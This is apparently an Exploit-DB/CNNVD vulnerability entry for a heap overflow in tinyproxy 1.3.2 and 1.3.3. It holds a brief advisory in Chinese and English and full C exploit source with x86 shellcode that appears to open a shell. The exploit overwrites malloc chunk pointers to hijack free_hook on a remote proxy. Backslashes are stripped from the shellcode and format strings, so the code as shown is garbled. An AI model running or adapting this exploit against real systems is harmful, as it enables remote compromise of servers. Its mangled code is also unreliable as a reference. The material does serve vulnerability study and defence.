https://www.exploit-db.com/exploits/20559
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-036

TinyproxyHTTPproxy1.3.3以及之前版本存在缓冲区溢出漏洞。远程攻击者借助超长连接请求导致服务拒绝并且可能执行任意命令。

source: http://www.securityfocus.com/bid/2217/info

Versions 1.3.2 and 1.3.3 of tinyproxy, a small HTTP proxy, exhibit a vulnerability to heap overflow attacks.

A failure to properly validate user-supplied input which arguments a call to sprintf() can allow unexpectedly large amounts of input to a buffer (used to display error messages) to be written past the boundary of the allocated space on the heap.

As a result, it may be possible to execute a denial of service attack, or even to execute arbitrary commands if certain internal memory structures can be successfully overwritten. 

/*
 * Exploit for tinyproxy 1.3.2 and 1.3.3
 * by |CyRaX| <[email protected]>
 * Packet Knights Crew - www.pkcrew.org
 * READ THE ADVISORY FIRST !
 * Greetz :
 *  bikappa: for some help
 *  all the pkc members expecially recidjvo, asynchro and cthulhu
 *  all the other friends
*/


#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>

char jmps[]="xebx0e";

char c0de[]="xebx0ex90x90x90x90x90x90x90x90x90x90x90x90x90x90"
            "x90x90x90x90x90x90x90"
            "x89xe5"
            "x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"
            "x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"
            "x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0"
            "x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd"
            "x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9"
            "x80xeax27x89xd0xcdx80x89xd0x41xcdx80xebx1fx5e"
            "x80x46x04x01"
            "x80x06x01"
            "x89x75"
            "x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08"
            "x8dx55x0cxcdx80xe8xdcxffxffxffx2ex62x69x6ex2ex73x68";

void usage();

void usage(){
   printf("Exploit for Tinyproxy 1.3.2 and 1.3.3 by |CyRaX| <[email protected]>n");
   printf("Packet Knights Crew - http://www.pkcrew.orgn");
   printf("please.. READ the advisory first!n");
   printf("Usage : ./PKCtiny-ex <host> <port> <buf_size> <struct offset> <free_hook> <shellcode>n");
   printf("buf_size is the size of the buf we sendn");
   printf("struct offset is the distance from the beginning of the buffer we send where wen");
   printf("       we put the malloc chunk struct!n");
   printf("free_hook is the address of the free_hook function pointern");
   printf("shellcode is the address of the shellcode (you don't neet to hit it correctlyn");
   printf("          you can just hope to it a jumpn");
   printf("nfree_hook and shellcode must be given in 0xaddress formatn");
   exit(0);
}

int main(int argc, char **argv){
   int s,i,err,pid[5];
   struct sockaddr_in dst;
   struct malloc_chunk{
      unsigned int ps;
      unsigned int sz;
      struct malloc_chunk *fd;
      struct malloc_chunk *bk;
   }mc;
   char *magic,*sndbuff;
   unsigned long FREE_HOOKZ,SHELLCODE;
   if(argc<5)usage();
   magic=(char *)malloc(atoi(argv[3])+1);
   sndbuff=(char *)malloc(atoi(argv[3])+30);
   memset(magic,'x90',atoi(argv[3]));

   SHELLCODE=strtol(argv[6],NULL,16);
   FREE_HOOKZ=strtol(argv[5],NULL,16);


   dst.sin_addr.s_addr=inet_addr(argv[1]);
   dst.sin_port=htons(atoi(argv[2]));
   dst.sin_family=AF_INET;
   mc.ps=0xffffffff & ~1;
   mc.sz=0xffffffff;
   mc.fd=(struct malloc_chunk *)(SHELLCODE);
   mc.bk=(struct malloc_chunk *)(FREE_HOOKZ-8);

   s=socket(AF_INET,SOCK_STREAM,0);
   connect(s,(struct sockaddr *)&dst,sizeof(dst));
   memcpy(magic+atoi(argv[4]),&mc,sizeof(mc));

   if((atoi(argv[3])/2)<atoi(argv[4])){
      /* putting jmps and shellcode before the struct */
      for(i=0;i<(atoi(argv[4])-strlen(c0de)-10);i+=2){
	 memcpy(magic+i,jmps,2);
      }
   }
   else {
      /* putting jmps and shellcode after the struct */
      for(i=atoi(argv[4])+sizeof(mc);i<atoi(argv[3])-10-strlen(c0de);i+=2){
	 memcpy(magic+i,jmps,2);
      }
   }
   memcpy(magic+i,c0de,strlen(c0de));

   magic[atoi(argv[3])]=0;

   printf("strlen magic is %in",strlen(magic));
   sndbuff[snprintf(sndbuff,atoi(argv[3])+20,"connect %s://n",magic)]=0;
   printf("shootingn");
   err=send(s,sndbuff,strlen(sndbuff),0);
}

来源:BID
名称:2217
链接:http://www.securityfocus.com/bid/2217
来源:DEBIAN
名称:DSA-018
链接:http://www.debian.org/security/2001/dsa-018
来源:BUGTRAQ
名称:20010117[pkc]remoteheapoverflowintinyproxy
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=97975486527750&w;=2
来源:XF
名称:tinyproxy-remote-bo(5954)
链接:http://xforce.iss.net/static/5954.php